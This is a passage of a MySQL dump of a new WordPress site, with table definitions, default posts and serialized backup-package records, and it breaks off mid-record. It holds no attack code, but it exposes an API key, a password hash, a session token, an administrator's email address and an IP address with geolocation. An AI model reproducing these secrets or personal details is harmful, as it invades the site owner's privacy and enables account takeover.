INSERT INTO `wp_9pdw7dva53_options` VALUES (93, 'widget_search', 'a:2:{i:2;a:1:{s:5:"title";s:0:"";}s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (94, 'widget_recent-posts', 'a:2:{i:2;a:2:{s:5:"title";s:0:"";s:6:"number";i:5;}s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (95, 'widget_recent-comments', 'a:2:{i:2;a:2:{s:5:"title";s:0:"";s:6:"number";i:5;}s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (96, 'widget_archives', 'a:2:{i:2;a:3:{s:5:"title";s:0:"";s:5:"count";i:0;s:8:"dropdown";i:0;}s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (97, 'widget_meta', 'a:2:{i:2;a:1:{s:5:"title";s:0:"";}s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (98, 'sidebars_widgets', 'a:3:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:6:{i:0;s:8:"search-2";i:1;s:14:"recent-posts-2";i:2;s:17:"recent-comments-2";i:3;s:10:"archives-2";i:4;s:12:"categories-2";i:5;s:6:"meta-2";}s:13:"array_version";i:3;}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (99, 'gd_system_version', '2.0.3', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (100, 'widget_pages', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (101, 'widget_calendar', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (102, 'widget_tag_cloud', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (103, 'widget_nav_menu', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (104, 'cron', 'a:4:{i:1474576360;a:1:{s:26:"upgrader_scheduled_cleanup";a:1:{s:32:"adcb9b75260590ff6058773ddcb9ddd6";a:2:{s:8:"schedule";b:0;s:4:"args";a:1:{i:0;i:4;}}}}i:1474612280;a:3:{s:16:"wp_version_check";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}s:17:"wp_update_plugins";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}s:16:"wp_update_themes";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}}i:1474655535;a:1:{s:19:"wp_scheduled_delete";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}s:7:"version";i:2;}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (109, 'gd_system_last_cache_flush', '1474569164', 'no'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (111, 'gem-settings', 'a:2:{s:7:"api-key";s:32:"9441329317689f83b0d30c8f8466d533";s:8:"username";s:40:"mwp:a6026980-4791-4fb9-93c1-4ba3e4e189df";}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (112, 'gem-valid-creds', '1', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (127, 'wpem_log', '{"datetime":"2016-09-22T18:32:14+00:00","fqdn":"p3nlwpweb065.shr.prod.phx3.secureserver.net","site_url":"https:\\/\\/c81.bc1.myftpupload.com","account_id":"c81b3601733982","user_email":"ddillulio@mschem.com","locale":"en_US","wp_version":"4.6.1","wpem_version":"2.0.9","geodata":{"city":"Danbury","country_code":"US","country_name":"United States","ip":"107.3.77.7","latitude":"41.378","longitude":"-73.469","postal_code":"06810","region_code":"CT","region_name":"Connecticut","timezone":"America\\/New_York"},"is_fresh_wp":true,"steps":{"start":{"took":"5.158","fields":{"wpem_continue":"no"}}},"took":"5.158"}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (131, 'wpem_opt_out', '1', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (132, 'wpem_done', '1', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (143, 'can_compress_scripts', '0', 'no'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (152, 'recently_activated', 'a:0:{}', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (155, 'gd_system_last_publish', '1474569164', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (156, 'gd_system_first_publish', '1474569160', 'yes'); 
INSERT INTO `wp_9pdw7dva53_options` VALUES (163, 'wpclone_directory_scan', 'a:4:{s:6:"dbsize";s:7:"1.61 MB";s:4:"size";s:7:"8.63 MB";s:5:"files";i:749;s:4:"time";i:1474569172;}', 'yes');
#
# End of data contents of table `wp_9pdw7dva53_options`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_9pdw7dva53_postmeta`


#
# Delete any existing table `wp_9pdw7dva53_postmeta`
#

DROP TABLE IF EXISTS `wp_9pdw7dva53_postmeta`;


#
# Table structure of table `wp_9pdw7dva53_postmeta`
#

CREATE TABLE `wp_9pdw7dva53_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_9pdw7dva53_postmeta`
#
 
INSERT INTO `wp_9pdw7dva53_postmeta` VALUES (1, 2, '_wp_page_template', 'default');
#
# End of data contents of table `wp_9pdw7dva53_postmeta`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_9pdw7dva53_posts`


#
# Delete any existing table `wp_9pdw7dva53_posts`
#

DROP TABLE IF EXISTS `wp_9pdw7dva53_posts`;


#
# Table structure of table `wp_9pdw7dva53_posts`
#

CREATE TABLE `wp_9pdw7dva53_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT '0',
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_title` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_excerpt` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
  `post_password` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `post_name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `to_ping` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `pinged` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `guid` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT '0',
  `post_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_9pdw7dva53_posts`
#
 
INSERT INTO `wp_9pdw7dva53_posts` VALUES (1, 1, '2016-09-22 18:31:20', '2016-09-22 18:31:20', 'Welcome to WordPress. This is your first post. Edit or delete it, then start writing!', 'Hello world!', '', 'publish', 'open', 'open', '', 'hello-world', '', '', '2016-09-22 18:31:20', '2016-09-22 18:31:20', '', 0, 'https://c81.bc1.myftpupload.com/?p=1', 0, 'post', '', 1); 
INSERT INTO `wp_9pdw7dva53_posts` VALUES (2, 1, '2016-09-22 18:31:20', '2016-09-22 18:31:20', 'This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:\n\n<blockquote>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like pi&#241;a coladas. (And gettin\' caught in the rain.)</blockquote>\n\n...or something like this:\n\n<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>\n\nAs a new WordPress user, you should go to <a href="https://c81.bc1.myftpupload.com/wp-admin/">your dashboard</a> to delete this page and create new pages for your content. Have fun!', 'Sample Page', '', 'publish', 'closed', 'open', '', 'sample-page', '', '', '2016-09-22 18:31:20', '2016-09-22 18:31:20', '', 0, 'https://c81.bc1.myftpupload.com/?page_id=2', 0, 'page', '', 0); 
INSERT INTO `wp_9pdw7dva53_posts` VALUES (3, 1, '2016-09-22 18:32:23', '0000-00-00 00:00:00', '', 'Auto Draft', '', 'auto-draft', 'open', 'open', '', '', '', '', '2016-09-22 18:32:23', '0000-00-00 00:00:00', '', 0, 'https://c81.bc1.myftpupload.com/?p=3', 0, 'post', '', 0);
#
# End of data contents of table `wp_9pdw7dva53_posts`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_9pdw7dva53_term_relationships`


#
# Delete any existing table `wp_9pdw7dva53_term_relationships`
#

DROP TABLE IF EXISTS `wp_9pdw7dva53_term_relationships`;


#
# Table structure of table `wp_9pdw7dva53_term_relationships`
#

CREATE TABLE `wp_9pdw7dva53_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_order` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_9pdw7dva53_term_relationships`
#
 
INSERT INTO `wp_9pdw7dva53_term_relationships` VALUES (1, 1, 0);
#
# End of data contents of table `wp_9pdw7dva53_term_relationships`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_9pdw7dva53_term_taxonomy`


#
# Delete any existing table `wp_9pdw7dva53_term_taxonomy`
#

DROP TABLE IF EXISTS `wp_9pdw7dva53_term_taxonomy`;


#
# Table structure of table `wp_9pdw7dva53_term_taxonomy`
#

CREATE TABLE `wp_9pdw7dva53_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `taxonomy` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_9pdw7dva53_term_taxonomy`
#
 
INSERT INTO `wp_9pdw7dva53_term_taxonomy` VALUES (1, 1, 'category', '', 0, 1);
#
# End of data contents of table `wp_9pdw7dva53_term_taxonomy`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_9pdw7dva53_termmeta`


#
# Delete any existing table `wp_9pdw7dva53_termmeta`
#

DROP TABLE IF EXISTS `wp_9pdw7dva53_termmeta`;


#
# Table structure of table `wp_9pdw7dva53_termmeta`
#

CREATE TABLE `wp_9pdw7dva53_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_9pdw7dva53_termmeta`
#

#
# End of data contents of table `wp_9pdw7dva53_termmeta`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_9pdw7dva53_terms`


#
# Delete any existing table `wp_9pdw7dva53_terms`
#

DROP TABLE IF EXISTS `wp_9pdw7dva53_terms`;


#
# Table structure of table `wp_9pdw7dva53_terms`
#

CREATE TABLE `wp_9pdw7dva53_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `slug` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT '0',
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_9pdw7dva53_terms`
#
 
INSERT INTO `wp_9pdw7dva53_terms` VALUES (1, 'Uncategorized', 'uncategorized', 0);
#
# End of data contents of table `wp_9pdw7dva53_terms`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_9pdw7dva53_usermeta`


#
# Delete any existing table `wp_9pdw7dva53_usermeta`
#

DROP TABLE IF EXISTS `wp_9pdw7dva53_usermeta`;


#
# Table structure of table `wp_9pdw7dva53_usermeta`
#

CREATE TABLE `wp_9pdw7dva53_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=16 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_9pdw7dva53_usermeta`
#
 
INSERT INTO `wp_9pdw7dva53_usermeta` VALUES (1, 1, 'nickname', 'ddillulio'); 
INSERT INTO `wp_9pdw7dva53_usermeta` VALUES (2, 1, 'first_name', ''); 
INSERT INTO `wp_9pdw7dva53_usermeta` VALUES (3, 1, 'last_name', ''); 
INSERT INTO `wp_9pdw7dva53_usermeta` VALUES (4, 1, 'description', ''); 
INSERT INTO `wp_9pdw7dva53_usermeta` VALUES (5, 1, 'rich_editing', 'true'); 
INSERT INTO `wp_9pdw7dva53_usermeta` VALUES (6, 1, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_9pdw7dva53_usermeta` VALUES (7, 1, 'admin_color', 'fresh'); 
INSERT INTO `wp_9pdw7dva53_usermeta` VALUES (8, 1, 'use_ssl', '0'); 
INSERT INTO `wp_9pdw7dva53_usermeta` VALUES (9, 1, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_9pdw7dva53_usermeta` VALUES (10, 1, 'wp_9pdw7dva53_capabilities', 'a:1:{s:13:"administrator";b:1;}'); 
INSERT INTO `wp_9pdw7dva53_usermeta` VALUES (11, 1, 'wp_9pdw7dva53_user_level', '10'); 
INSERT INTO `wp_9pdw7dva53_usermeta` VALUES (12, 1, 'dismissed_wp_pointers', ''); 
INSERT INTO `wp_9pdw7dva53_usermeta` VALUES (13, 1, 'show_welcome_panel', '1'); 
INSERT INTO `wp_9pdw7dva53_usermeta` VALUES (14, 1, 'session_tokens', 'a:1:{s:64:"f0ca8d0f97562aba02b448044b1c117baeb2eb536c1959acd37cc2f0832b179d";a:4:{s:10:"expiration";i:1474741934;s:2:"ip";s:10:"107.3.77.7";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36";s:5:"login";i:1474569134;}}'); 
INSERT INTO `wp_9pdw7dva53_usermeta` VALUES (15, 1, 'wp_9pdw7dva53_dashboard_quick_press_last_post_id', '3');
#
# End of data contents of table `wp_9pdw7dva53_usermeta`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_9pdw7dva53_users`


#
# Delete any existing table `wp_9pdw7dva53_users`
#

DROP TABLE IF EXISTS `wp_9pdw7dva53_users`;


#
# Table structure of table `wp_9pdw7dva53_users`
#

CREATE TABLE `wp_9pdw7dva53_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_pass` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_nicename` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_url` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT '0',
  `display_name` varchar(250) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_9pdw7dva53_users`
#
 
INSERT INTO `wp_9pdw7dva53_users` VALUES (1, 'ddillulio', '$P$BiIQDiU2FYiUb2k1tBbqSBLwITllf51', 'ddillulio', 'ddillulio@mschem.com', '', '2016-09-22 18:31:20', '', 0, 'ddillulio');
#
# End of data contents of table `wp_9pdw7dva53_users`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_commentmeta`


#
# Delete any existing table `wp_commentmeta`
#

DROP TABLE IF EXISTS `wp_commentmeta`;


#
# Table structure of table `wp_commentmeta`
#

CREATE TABLE `wp_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_commentmeta`
#

#
# End of data contents of table `wp_commentmeta`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_comments`


#
# Delete any existing table `wp_comments`
#

DROP TABLE IF EXISTS `wp_comments`;


#
# Table structure of table `wp_comments`
#

CREATE TABLE `wp_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT '0',
  `comment_author` tinytext COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_author_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT '0',
  `comment_approved` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_comments`
#

#
# End of data contents of table `wp_comments`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_duplicator_packages`


#
# Delete any existing table `wp_duplicator_packages`
#

DROP TABLE IF EXISTS `wp_duplicator_packages`;


#
# Table structure of table `wp_duplicator_packages`
#

CREATE TABLE `wp_duplicator_packages` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(250) NOT NULL,
  `hash` varchar(50) NOT NULL,
  `status` int(11) NOT NULL,
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `owner` varchar(60) NOT NULL,
  `package` mediumblob NOT NULL,
  PRIMARY KEY (`id`),
  KEY `hash` (`hash`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=latin1 ;

#
# Data contents of table `wp_duplicator_packages`
#
 
INSERT INTO `wp_duplicator_packages` VALUES (1, '20161020_millerstephensonchemicals', '5808aecb3ea392786161020114723', 40, '2016-10-20 11:48:31', 'ddillulio@mschem.com', 'O:11:"DUP_Package":23:{s:7:"Created";s:19:"2016-10-20 11:47:23";s:7:"Version";s:6:"1.1.18";s:9:"VersionWP";s:5:"4.6.1";s:9:"VersionDB";s:6:"5.5.43";s:10:"VersionPHP";s:6:"5.4.42";s:9:"VersionOS";s:5:"Linux";s:2:"ID";i:1;s:4:"Name";s:34:"20161020_millerstephensonchemicals";s:4:"Hash";s:29:"5808aecb3ea392786161020114723";s:8:"NameHash";s:64:"20161020_millerstephensonchemicals_5808aecb3ea392786161020114723";s:4:"Type";i:0;s:5:"Notes";s:0:"";s:9:"StorePath";s:67:"/home/content/p3pnexwpnas01_data03/33/3601733/html/wp-snapshots/tmp";s:8:"StoreURL";s:46:"http://www.miller-stephenson.com/wp-snapshots/";s:8:"ScanFile";s:74:"20161020_millerstephensonchemicals_5808aecb3ea392786161020114723_scan.json";s:7:"Runtime";N;s:7:"ExeSize";N;s:7:"ZipSize";N;s:6:"Status";N;s:6:"WPUser";s:20:"ddillulio@mschem.com";s:7:"Archive";O:11:"DUP_Archive":13:{s:10:"FilterDirs";s:0:"";s:10:"FilterExts";s:0:"";s:13:"FilterDirsAll";a:0:{}s:13:"FilterExtsAll";a:0:{}s:8:"FilterOn";i:0;s:4:"File";s:76:"20161020_millerstephensonchemicals_5808aecb3ea392786161020114723_archive.zip";s:6:"Format";s:3:"ZIP";s:7:"PackDir";s:50:"/home/content/p3pnexwpnas01_data03/33/3601733/html";s:4:"Size";i:0;s:4:"Dirs";a:0:{}s:5:"Files";a:0:{}s:10:"FilterInfo";O:23:"DUP_Archive_Filter_Info":6:{s:4:"Dirs";O:34:"DUP_Archive_Filter_Scope_Directory":4:{s:7:"Warning";a:0:{}s:10:"Unreadable";a:0:{}s:4:"Core";a:0:{}s:8:"Instance";a:0:{}}s:5:"Files";O:29:"DUP_Archive_Filter_Scope_File":5:{s:4:"Size";a:0:{}s:7:"Warning";a:0:{}s:10:"Unreadable";a:0:{}s:4:"Core";a:0:{}s:8:"Instance";a:0:{}}s:4:"Exts";O:29:"DUP_Archive_Filter_Scope_Base":2:{s:4:"Core";a:0:{}s:8:"Instance";a:0:{}}s:9:"UDirCount";i:0;s:10:"UFileCount";i:0;s:9:"UExtCount";i:0;}s:10:"\0*\0Package";r:1;}s:9:"Installer";O:13:"DUP_Installer":12:{s:4:"File";s:78:"20161020_millerstephensonchemicals_5808aecb3ea392786161020114723_installer.php";s:4:"Size";i:0;s:10:"OptsDBHost";s:0:"";s:10:"OptsDBPort";s:0:"";s:10:"OptsDBName";s:0:"";s:10:"OptsDBUser";s:0:"";s:12:"OptsSSLAdmin";i:0;s:12:"OptsSSLLogin";i:0;s:11:"OptsCacheWP";i:0;s:13:"OptsCachePath";i:0;s:10:"OptsURLNew";s:0:"";s:10:"\0*\0Package";O:11:"DUP_Package":23:{s:7:"Created";s:19:"2016-10-20 11:47:23";s:7:"Version";s:6:"1.1.18";s:9:"VersionWP";s:5:"4.6.1";s:9:"VersionDB";s:6:"5.5.43";s:10:"VersionPHP";s:6:"5.4.42";s:9:"VersionOS";s:5:"Linux";s:2:"ID";N;s:4:"Name";s:34:"20161020_millerstephensonchemicals";s:4:"Hash";s:29:"5808aecb3ea392786161020114723";s:8:"NameHash";s:64:"20161020_millerstephensonchemicals_5808aecb3ea392786161020114723";s:4:"Type";i:0;s:5:"Notes";s:0:"";s:9:"StorePath";s:67:"/home/content/p3pnexwpnas01_data03/33/3601733/html/wp-snapshots/tmp";s:8:"StoreURL";s:46:"http://www.miller-stephenson.com/wp-snapshots/";s:8:"ScanFile";N;s:7:"Runtime";N;s:7:"ExeSize";N;s:7:"ZipSize";N;s:6:"Status";N;s:6:"WPUser";N;s:7:"Archive";r:22;s:9:"Installer";r:53;s:8:"Database";O:12:"DUP_Database":12:{s:4:"Type";s:5:"MySQL";s:4:"Size";i:13868066;s:4:"File";s:77:"20161020_millerstephensonchemicals_5808aecb3ea392786161020114723_database.sql";s:4:"Path";N;s:12:"FilterTables";s:0:"";s:8:"FilterOn";i:0;s:4:"Name";N;s:10:"Compatible";s:0:"";s:10:"\0*\0Package";r:1;s:25:"\0DUP_Database\0dbStorePath";s:145:"/home/content/p3pnexwpnas01_data03/33/3601733/html/wp-snapshots/tmp/20161020_millerstephensonchemicals_5808aecb3ea392786161020114723_database.sql";s:23:"\0DUP_Database\0EOFMarker";s:0:"";s:26:"\0DUP_Database\0networkFlush";b:0;}}}s:8:"Database";r:88;}'); 
INSERT INTO `wp_duplicator_packages` VALUES (2, '20161020_millerstephensonchemicals', '5808b0396e3dc6428161020115329', 40, '2016-10-20 11:53:58', 'ddillulio@mschem.com', 'O:11:"DUP_Package":23:{s:7:"Created";s:19:"2016-10-20 11:53:29";s:7:"Version";s:6:"1.1.18";s:9:"VersionWP";s:5:"4.6.1";s:9:"VersionDB";s:6:"5.5.43";s:10:"VersionPHP";s:6:"5.4.42";s:9:"VersionOS";s:5:"Linux";s:2:"ID";i:2;s:4:"Name";s:34:"20161020_millerstephensonchemicals";s:4:"Hash";s:29:"5808b0396e3dc6428161020115329";s:8:"NameHash";s:64:"20161020_millerstephensonchemicals_5808b0396e3dc6428161020115329";s:4:"Type";i:0;s:5:"Notes";s:0:"";s:9:"StorePath";s:67:"/home/content/p3pnexwpnas01_data03/33/3601733/html/wp-snapshots/tmp";s:8:"StoreURL";s:46:"http://www.miller-stephenson.com/wp-snapshots/";s:8:"ScanFile";s:74:"20161020_millerstephensonchemicals_5808b0396e3dc6428161020115329_scan.json";s:7:"Runtime";N;s:7:"ExeSize";N;s:7:"ZipSize";N;s:6:"Status";N;s:6:"WPUser";s:20:"ddillulio@mschem.com";s:7:"Archive";O:11:"DUP_Archive":13:{s:10:"FilterDirs";s:0:"";s:10:"FilterExts";s:0:"";s:13:"FilterDirsAll";a:0:{}s:13:"FilterExtsAll";a:0:{}s:8:"FilterOn";i:0;s:4:"File";s:76:"20161020_millerstephensonchemicals_5808b0396e3dc6428161020115329_archive.zip";s:6:"Format";s:3:"ZIP";s:7:"PackDir";s:50:"/home/content/p3pnexwpnas01_data03/33/3601733/html";s:4:"Size";i:0;s:4:"Dirs";a:0:{}s:5:"Files";a:0:{}s:10:"FilterInfo";O:23:"DUP_Archive_Filter_Info":6:{s:4:"Dirs";O